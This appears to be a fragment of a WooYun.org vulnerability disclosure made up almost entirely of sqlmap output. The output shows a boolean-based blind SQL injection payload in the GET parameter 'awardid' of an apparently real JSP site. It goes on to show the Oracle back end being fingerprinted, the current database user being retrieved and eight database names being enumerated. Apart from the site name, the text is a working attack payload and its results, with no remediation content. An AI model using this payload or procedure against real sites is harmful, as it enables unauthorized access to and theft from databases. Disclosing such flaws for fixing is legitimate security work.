WooYun.org

Place: GET
Parameter: awardid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: awardid=370' AND 3277=3277 AND 'cfYo'='cfYo
---
[15:43:01] [INFO] testing MySQL
[15:43:01] [WARNING] the back-end DBMS is not MySQL
[15:43:01] [INFO] testing Oracle
[15:43:05] [INFO] confirming Oracle
[15:43:08] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:43:08] [INFO] fetching current user
[15:43:08] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:43:08] [INFO] retrieved: WEBOPR
current user:    'WEBOPR'

available databases [8]:
[*] CTXSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WEBDATA
[*] WKSYS
[*] WMSYS